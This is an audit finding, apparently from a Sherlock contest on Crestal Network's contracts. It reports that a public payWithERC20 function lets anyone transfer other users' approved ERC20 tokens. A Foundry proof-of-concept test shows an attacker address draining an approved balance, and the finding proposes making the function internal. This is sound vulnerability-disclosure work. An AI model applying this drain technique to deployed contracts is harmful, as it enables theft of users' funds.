Mini Sangria Dragonfly

High

# Unauthorized Token Drain via payWithERC20 Due to Unrestricted External Calls

### Summary

The `payWithERC20` function in the `blueprint `contract allows an attacker to steal tokens from users who have approved the contract to spend their tokens. Since users need to approve tokens for various functions (e.g., `updateWorkerDeploymentConfig`, `userTopUp`, and `createAgent`), an attacker can exploit this by calling `payWithERC20` before the user revokes their approval, effectively draining their funds.

### Root Cause

1. `payWithERC20` is public, allowing any address to call it arbitrarily.
2. The contract does not restrict who can invoke `payWithERC20`, enabling attackers to transfer tokens from users who have granted approval to themself.
3. The user’s approval remains valid until manually revoked, giving the attacker a window to execute unauthorized transactions.

https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/Payment.sol#L25-L32

### Internal Pre-conditions

-

### External Pre-conditions

-

### Attack Path

-

### Impact

**Loss of User Funds:** Attackers can drain approved tokens before users revoke their approval and can even do this multiple times.


### PoC

```solidity
function test_AbilityToStealTokenUsingTheContract() public {
    uint256 validTokenAmount = 100 * 10 ** 18;

    mockToken.mint(address(this), validTokenAmount);
    mockToken.approve(address(blueprint), validTokenAmount);

    address attacker = makeAddr("attacker");
    uint256 allowance = mockToken.allowance(
        address(this),
        address(blueprint)
    );

    vm.prank(attacker);
    blueprint.payWithERC20(
        address(mockToken),
        allowance,
        address(this),
        attacker
    );

    uint balOfAddressThis = mockToken.balanceOf(address(this));
    uint balOfAttacker = mockToken.balanceOf(attacker);

    assertEq(0, balOfAddressThis);
    assertEq(allowance, balOfAttacker);
}
```

### Mitigation

1. **Restrict `payWithERC20 `Access:**
Make `payWithERC20` **internal** so it can only be called by contract functions, preventing external abuse.